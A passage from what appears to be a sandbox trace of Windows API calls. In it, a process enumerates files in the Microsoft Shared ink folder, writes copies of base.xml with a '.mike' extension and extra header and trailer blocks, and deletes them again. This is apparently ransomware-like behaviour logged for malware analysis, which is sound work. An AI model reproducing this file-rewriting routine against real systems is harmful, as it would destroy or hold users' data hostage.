cFileName="ja-jp.xml", cAlternateFileName="")) returned 1 [0045.714] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d7449e, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d7449e, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f70223f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x3af9, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-kr.xml", cAlternateFileName="")) returned 1 [0045.714] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d9a5fb, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d9a5fb, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f774659, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x264b, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-changjei.xml", cAlternateFileName="")) returned 1 [0045.714] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e7ee29, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1e7ee29, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f79a7b7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2b3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-dayi.xml", cAlternateFileName="")) returned 1 [0045.714] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e32b6f, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1e32b6f, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f79a7b7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-phonetic.xml", cAlternateFileName="")) returned 1 [0045.714] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0045.714] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0045.715] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0045.715] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0045.715] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0045.715] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.740] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adec8) returned 1 [0045.740] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefc4) returned 1 [0045.740] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.789] GetFileType (hFile=0x264) returned 0x1 [0045.789] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefc0) returned 1 [0045.789] GetFileType (hFile=0x264) returned 0x1 [0045.789] CloseHandle (hObject=0x264) returned 1 [0045.790] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml", lpFilePart=0x0) returned 0x4e [0045.790] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml", lpFilePart=0x0) returned 0x4e [0045.790] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aebcc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0045.790] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af120) returned 1 [0045.790] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0045.790] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0045.790] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.790] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml"), fInfoLevelId=0x0, lpFileInformation=0x2177254 | out: lpFileInformation=0x2177254*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f643b69, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f643b69, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f643b69, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xc4e)) returned 1 [0045.790] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.790] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml", lpFilePart=0x0) returned 0x4e [0045.790] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.790] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml"), fInfoLevelId=0x0, lpFileInformation=0x2177588 | out: lpFileInformation=0x2177588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f643b69, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f643b69, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f643b69, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xc4e)) returned 1 [0045.790] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.790] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml", lpFilePart=0x0) returned 0x4e [0045.790] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml.mike", lpFilePart=0x0) returned 0x53 [0045.790] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0045.790] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.791] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0045.791] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml", lpFilePart=0x0) returned 0x4e [0045.791] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml", lpFilePart=0x0) returned 0x4e [0045.791] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml", nBufferLength=0x105, lpBuffer=0x2aebac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml", lpFilePart=0x0) returned 0x4e [0045.791] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml.mike", lpFilePart=0x0) returned 0x53 [0045.791] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af010) returned 1 [0045.791] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af08c | out: lpFileInformation=0x2af08c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.791] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af00c) returned 1 [0045.791] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml.mike", lpFilePart=0x0) returned 0x53 [0045.791] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0045.791] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.792] GetFileType (hFile=0x264) returned 0x1 [0045.792] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0045.792] GetFileType (hFile=0x264) returned 0x1 [0045.792] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x0 [0045.792] WriteFile (in: hFile=0x264, lpBuffer=0x21784a4*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x21784a4*, lpNumberOfBytesWritten=0x2af02c*=0x220, lpOverlapped=0x0) returned 1 [0045.793] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0045.793] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml"), fInfoLevelId=0x0, lpFileInformation=0x2177f8c | out: lpFileInformation=0x2177f8c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f643b69, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f643b69, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f643b69, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xc4e)) returned 1 [0045.793] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0045.793] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml", nBufferLength=0x105, lpBuffer=0x2aeaa8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml", lpFilePart=0x0) returned 0x4e [0045.793] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0045.793] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.793] GetFileType (hFile=0x264) returned 0x1 [0045.793] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0045.793] GetFileType (hFile=0x264) returned 0x1 [0045.793] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af02c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af02c*=0) returned 0x0 [0045.793] ReadFile (in: hFile=0x264, lpBuffer=0x21795d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x21795d8*, lpNumberOfBytesRead=0x2af038*=0xc4e, lpOverlapped=0x0) returned 1 [0045.795] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml.mike", lpFilePart=0x0) returned 0x53 [0045.795] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0045.795] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.795] GetFileType (hFile=0x264) returned 0x1 [0045.795] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0045.795] GetFileType (hFile=0x264) returned 0x1 [0045.795] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x220 [0045.796] WriteFile (in: hFile=0x264, lpBuffer=0x2180e50*, nNumberOfBytesToWrite=0xc50, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x2180e50*, lpNumberOfBytesWritten=0x2af02c*=0xc50, lpOverlapped=0x0) returned 1 [0045.796] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeac0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml.mike", lpFilePart=0x0) returned 0x53 [0045.796] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefb4) returned 1 [0045.796] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.796] GetFileType (hFile=0x264) returned 0x1 [0045.796] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefb0) returned 1 [0045.796] GetFileType (hFile=0x264) returned 0x1 [0045.797] WriteFile (in: hFile=0x264, lpBuffer=0x2184080*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x2184080*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0045.797] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml", lpFilePart=0x0) returned 0x4e [0045.797] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml.mike", lpFilePart=0x0) returned 0x53 [0045.797] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0045.797] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe58003a0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe58003a0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe58003a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xe70)) returned 1 [0045.797] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0045.798] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml", lpFilePart=0x0) returned 0x4e [0045.798] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml.mike", lpFilePart=0x0) returned 0x53 [0045.798] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.798] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2185868 | out: lpFileInformation=0x2185868*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe58003a0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe58003a0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe58003a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xe70)) returned 1 [0045.798] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.798] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml", lpFilePart=0x0) returned 0x4e [0045.798] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml", dwFileAttributes=0x80) returned 0 [0045.799] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml", lpFilePart=0x0) returned 0x4e [0045.799] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml.mike", lpFilePart=0x0) returned 0x53 [0045.799] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe0) returned 1 [0045.799] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af05c | out: lpFileInformation=0x2af05c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe58003a0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe58003a0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe58003a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xe70)) returned 1 [0045.799] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefdc) returned 1 [0045.799] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml", lpFilePart=0x0) returned 0x4e [0045.799] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml.mike", lpFilePart=0x0) returned 0x53 [0045.799] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml.mike")) returned 1 [0045.801] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", lpFilePart=0x0) returned 0x57 [0045.801] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", lpFilePart=0x0) returned 0x57 [0045.802] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", lpFilePart=0x0) returned 0x57 [0045.802] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0045.802] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.803] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adec8) returned 1 [0045.803] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", nBufferLength=0x105, lpBuffer=0x2aead0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", lpFilePart=0x0) returned 0x57 [0045.803] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefc4) returned 1 [0045.803] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.803] GetFileType (hFile=0x264) returned 0x1 [0045.803] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefc0) returned 1 [0045.803] GetFileType (hFile=0x264) returned 0x1 [0045.803] CloseHandle (hObject=0x264) returned 1 [0045.803] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", lpFilePart=0x0) returned 0x57 [0045.803] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", nBufferLength=0x105, 